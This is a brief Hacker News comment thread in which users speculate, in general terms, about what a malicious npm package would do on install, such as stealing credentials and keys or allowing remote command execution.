logoalt Hacker News

rektomaticyesterday at 8:30 PM5 repliesview on HN

I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?

Replies

flexagoonyesterday at 9:01 PM

AFAIK most malware like this first sends the contents of your environment variables, ssh keys, passwords, etc. to the server, and then sets up a persistent process that executes arbitrary commands received from the attacker's server at any time, allowing them to run whatever else they want

imankulovyesterday at 8:41 PM

You can actually test it yourself. The actual URL is in the post and the website is still up.

show 1 reply
phyzometoday at 1:19 AM

Compromise of developer's access, API keys, etc. in order to create a supply chain attack.

gman2093yesterday at 8:35 PM

Arbitrary remote code execution, maybe sold to the highest bidder like some shady cloud provider?

TurdF3rgusontoday at 12:17 AM

This has happened to me, it was an attack that was trying to get crypto private keys (ethereum)